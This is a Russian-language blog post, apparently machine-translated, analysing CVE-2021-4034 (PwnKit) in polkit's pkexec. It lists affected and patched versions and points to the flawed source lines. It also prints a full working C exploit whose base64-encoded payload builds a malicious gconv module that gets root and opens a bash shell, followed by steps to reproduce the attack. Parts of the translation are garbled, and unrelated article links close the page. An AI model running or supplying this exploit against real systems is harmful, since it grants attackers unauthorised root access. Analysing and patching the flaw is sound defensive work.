CVE-2021-4034 уязвимость повышения привилегий polkit (pkexec) появляется снова
1. Краткое описание уязвимости:
Polkit — это менеджер авторизации. Его системная архитектура состоит из агентов авторизации и аутентификации. pkexec — один из инструментов polkit. Его функция чем-то похожа на sudo, позволяя пользователям выполнять команды от имени другого пользователя.
polkit предоставляет API авторизации для использования привилегированными программами («МЕХАНИЗМЫ») и непривилегированными программами («СУБЪЕКТЫ»), обычно через ту или иную форму механизма межпроцессного взаимодействия. В этом случае механизм обычно рассматривает субъект как недоверенный. Для каждого запроса от принципала механизм должен определить, авторизован ли запрос или ему следует отказать в обслуживании принципалу. Используя API-интерфейс polkit, механизм может передать это решение доверенной стороне: органу власти polkit.
polkit Разрешения реализованы как системные демоны. polkitd (8),Он не имеет никаких привилегий сам по себе,Потому что это начинается с polkitdЗапуск от имени системного пользователя。механизм、Принципалы и агенты аутентификации общаются с органами власти, используя системную шину сообщений.
Помимо авторизации, polkit также позволяет пользователям получать временную авторизацию путем аутентификации администратора или владельца сеанса, к которому принадлежит клиент. Это полезно для сценариев, когда механизму необходимо проверить, что оператор системы действительно является пользователем или пользователем с правами администратора.
Базовый состав плокита
polkit— Менеджер авторизации
polkitd— polkit Системный демон
pkcheck— Проверьте, авторизован ли процесс
pkaction— Получить подробную информацию о зарегистрированных операциях
pkexec— Выполнить команду от имени другого пользователя
pkttyagent— Помощник по аутентификации текста
2. Затронутые версии:
1. Затронутые версии
· Все выпуски с мая 2009 г. по настоящее время Polkit Версия
Примечание. Polkit предварительно установлен во многих дистрибутивах Linux, таких как CentOS, Ubuntu, Debian, Redhat, Fedora, Gentoo, Mageia и т. д. Это касается всех систем Linux, где существует Polkit.2. Незатронутая версия
CentOS:
· CentOS 6:polkit-0.96-11.el6_10.2
· CentOS 7:polkit-0.112-26.el7_9.1
· CentOS 8.0:polkit-0.115-13.el8_5.1
· CentOS 8.2:polkit-0.115-11.el8_2.2
· CentOS 8.4:polkit-0.115-11.el8_4.2
Ubuntu:
· Ubuntu 14.04 ESM:policykit-1-0.105-4ubuntu3.14.04.6+esm1
· Ubuntu 16.04 ESM:policykit-1-0.105-14.1ubuntu0.5+esm1
· Ubuntu 18.04 LTS:policykit-1-0.105-20ubuntu0.18.04.6
· Ubuntu 20.04 LTS:policykit-1-0.105-26ubuntu1.2
· Ubuntu 21.10:policykit-1-0.105-31ubuntu0.1
Debain:
· :policykit-1 0.105-18+deb9u2
· Debain stretch:policykit-1 0.105-18+deb9u2
· Debain buster:policykit-1 0.105-25+deb10u1
· Debain bullseye:policykit-1 0.105-31+deb11u1
· Debain bookworm,bullseye:policykit-1 0.105-31.13.логика использования exp:
https://github.com/luijait/PwnKit-Exploit/exploit.c
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
/**
* @author: luijait
* @version: 1.0
* @CVE: CVE-2021-4034
*/
void enviroment()
{
system("mkdir 'GCONV_PATH=.' && touch 'GCONV_PATH=./tmp' && chmod +x 'GCONV_PATH=./tmp'");
system("mkdir tmp;echo I2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzdGRsaWIuaD4KI2luY2x1ZGUgPHVuaXN0ZC5oPgoKdm9pZCBnY29udih2b2lkKSB7fQoKCnZvaWQgZ2NvbnZfaW5pdCh2b2lkICpzdGVwKQp7CgkvL1Blcm1zIAoJc2V0dWlkKDApOyBzZXRldWlkKDApOyBzZXRnaWQoMCk7IHNldGVnaWQoMCk7CQoJLy9JbnZvcXVlIFNoZWxsCgljaGFyICogc2hlbGxbXSA9IHsgIi9iaW4vYmFzaCIsICItaSIsIE5VTEwgfTsKCS8vRGVmaW5lIFBhdGgKCWNoYXIgKiBlbnZfdmFyc1tdID0geyAiUEFUSD0vdXNyL2xvY2FsL3NiaW46L3Vzci9sb2NhbC9iaW46L3Vzci9zYmluOi91c3IvYmluOi9zYmluOi9iaW4iLCBOVUxMIH07CglleGVjdmUoc2hlbGxbMF0sIHNoZWxsLCBlbnZfdmFycyk7CglleGl0KDApOyAKfQo= | base64 -d > tmp/b64load.c; gcc tmp/b64load.c -o tmp/pwnkit.so -shared -fPIC ");
system("echo bW9kdWxlIFVURi04Ly8gUFdOS0lULy8gcHdua2l0IDIK | base64 -d > tmp/gconv-modules");
}
void banner()
{
setvbuf(stdout, NULL, _IONBF, 0);
printf("Current User before execute exploit\nhacker@victim$whoami: ");
system("whoami");
sleep(1);
printf("Exploit written by @luijait (0x6c75696a616974)");
}
int main(int argc, char **argv)
{
banner();
enviroment();
char * const idk[] = {
NULL
};
char * const entorno[] = {"tmp",
"PATH=GCONV_PATH=.",
"SHELL=/random",
"CHARSET=PWNKIT",
"GIO_USE_VFS=",NULL
};
printf("\n[+] Enjoy your root if exploit was completed succesfully\n");
return execve("/usr/bin/pkexec", idk, entorno);
}
Основное объяснение:
argc указывает, сколько существует параметров командной строки.,Первый — это имя программы выполнения.,такargcПо меньшей мере1。
argv — это конкретный параметр.
envp — переменная системной среды. Обычная форма: «имя=значение», завершается NULL.
char *argv[ ] Массив строк, представляющий параметры командной строки, используемый для хранения массива указателей на строковые параметры, где каждый элемент указывает на параметр.
envp Сохраните параметры текущей среды выполнения программы.
int argc представляет количество строк командной строки.
4. Логика точек уязвимости:
pkexecИсходный код:https://gitlab.freedesktop.org/polkit/polkit/-/blob/0.120/src/programs/pkexec.c
Логика точки уязвимости: если при выполнении pkexec указан вредоносный envp[0], переменная среды может быть записана в пространство целевого процесса.
1. Строка 534, начальное значение n равно 1.
534 for (n = 1; n < (guint) argc; n++)2. Строка 610, argv[1] фактически указывает на envp[0], и путь будет назначен envp[0]
610 path = g_strdup (argv[n]);3. Строка 632, найдите абсолютный путь к программе через переменную среды PATH и верните: s = g_find_program_in_path(путь),
632 s = g_find_program_in_path (path);4. Строка 639, наконец, вызывает выход индекса массива за пределы: в этот момент argv[1] назначается абсолютный адрес, то есть envp[0] назначается абсолютный адрес.
639 argv[n] = path = s;5. Повторение уязвимости
1. Среда воспроизводства:
Операционная система: Linux VM-0-5-ubuntu 5.4.0-88-generic x86_64 x86_64 x86_64 GNU/Linux
версия pkexec: 0.105
2. Триггер повышения привилегий при обнаружении уязвимости:
(1) Локальные разрешения обычного пользователя: разрешения Ubuntu.
id
(2) Выполните exp для повышения уровня корня
make
./exploit
id
6. Ссылка на принцип уязвимости:
PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034)
Qualys Бхарат, директор по исследованиям уязвимостей и угроз Jogi Bharat Jogi, Director, Vulnerability and Threat Research, Qualys https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
обзор полкита
https://www.freedesktop.org/software/polkit/docs/latest/
polkit архитектура и описание
https://www.freedesktop.org/software/polkit/docs/latest/polkit.8.html
pkexec архитектура и описание
https://www.freedesktop.org/software/polkit/docs/latest/pkexec.1.html
CVE-2021-4034 углубленный анализ и воспроизведение уязвимости
23R3F:
Неразрушающее увеличение изображений одним щелчком мыши, чтобы сделать их более четкими артефактами искусственного интеллекта, включая руководства по установке и использованию.
Копикодер: этот инструмент отлично работает с Cursor, Bolt и V0! Предоставьте более качественные подсказки для разработки интерфейса (создание навигационного веб-сайта с использованием искусственного интеллекта).
Новый бесплатный RooCline превосходит Cline v3.1? ! Быстрее, умнее и лучше вилка Cline! (Независимое программирование AI, порог 0)
Разработав более 10 проектов с помощью Cursor, я собрал 10 примеров и 60 подсказок.
Я потратил 72 часа на изучение курсорных агентов, и вот неоспоримые факты, которыми я должен поделиться!
Идеальная интеграция Cursor и DeepSeek API
DeepSeek V3 снижает затраты на обучение больших моделей
Артефакт, увеличивающий количество очков: на основе улучшения характеристик препятствия малым целям Yolov8 (SEAM, MultiSEAM).
DeepSeek V3 раскручивался уже три дня. Сегодня я попробовал самопровозглашенную модель «ChatGPT».
Open Devin — инженер-программист искусственного интеллекта с открытым исходным кодом, который меньше программирует и больше создает.
Эксклюзивное оригинальное улучшение YOLOv8: собственная разработка SPPF | SPPF сочетается с воспринимаемой большой сверткой ядра UniRepLK, а свертка с большим ядром + без расширения улучшает восприимчивое поле
Популярное и подробное объяснение DeepSeek-V3: от его появления до преимуществ и сравнения с GPT-4o.
9 основных словесных инструкций по доработке академических работ с помощью ChatGPT, эффективных и практичных, которые стоит собрать
Вызовите deepseek в vscode для реализации программирования с помощью искусственного интеллекта.
Познакомьтесь с принципами сверточных нейронных сетей (CNN) в одной статье (суперподробно)
50,3 тыс. звезд! Immich: автономное решение для резервного копирования фотографий и видео, которое экономит деньги и избавляет от беспокойства.
Cloud Native|Практика: установка Dashbaord для K8s, графика неплохая
Краткий обзор статьи — использование синтетических данных при обучении больших моделей и оптимизации производительности
MiniPerplx: новая поисковая система искусственного интеллекта с открытым исходным кодом, спонсируемая xAI и Vercel.
Конструкция сервиса Synology Drive сочетает проникновение в интрасеть и синхронизацию папок заметок Obsidian в облаке.
Центр конфигурации————Накос
Начинаем с нуля при разработке в облаке Copilot: начать разработку с минимальным использованием кода стало проще
[Серия Docker] Docker создает мультиплатформенные образы: практика архитектуры Arm64
Обновление новых возможностей coze | Я использовал coze для создания апплета помощника по исправлению домашних заданий по математике
Советы по развертыванию Nginx: практическое создание статических веб-сайтов на облачных серверах
Feiniu fnos использует Docker для развертывания личного блокнота Notepad
Сверточная нейронная сеть VGG реализует классификацию изображений Cifar10 — практический опыт Pytorch
Начало работы с EdgeonePages — новым недорогим решением для хостинга веб-сайтов
[Зона легкого облачного игрового сервера] Управление игровыми архивами
